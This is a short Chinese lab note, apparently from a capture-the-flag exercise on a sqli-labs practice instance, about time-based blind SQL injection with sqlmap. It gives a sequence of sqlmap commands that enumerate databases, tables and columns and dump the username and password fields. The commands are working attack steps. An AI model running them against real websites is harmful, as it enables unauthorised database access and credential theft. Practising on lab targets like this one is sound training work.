什么是时间盲注
时间盲注是指基于时间的盲注,也叫延时注入,根据页面的响应时间来判断是否存在注入。
使用sqlmap不同的技术
sqlmap --technique 参数用来设置具体SQL注入技术
B: Boolean-based blind 基于布尔的忙逐步
E:Error-based 报错注入
U:Union query-based Union查询注入
S:Stacked queries 堆叠注入
T:Time-based blind 基于时间的盲注
Q:lnline queries 内联查询注入
例如:
sqlmap -u "存在注入点的URL" --technique B --current-db #利用基于布尔的盲注对注入点进行SQL注入探测。
原文链接:https://blog.csdn.net/qq_49091880/article/details/122301562
使用时间盲注的脚本
1.爆数据库
sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T --current-db --batch
batch是强制执行所有选择Y
2.爆破表名
sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security --tables --batch
3.爆破列名
时间太慢了,sqlmap可以调整回显时间,
sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users --columns --time-sec=1 --batch
--time-sec=1:回显时间为1
4. 爆破列里的数据
sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users -C password --dump --time-sec=1 --batch
sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users -C username --dump --time-sec=1 --batch
时间盲注缺点:用时比较长。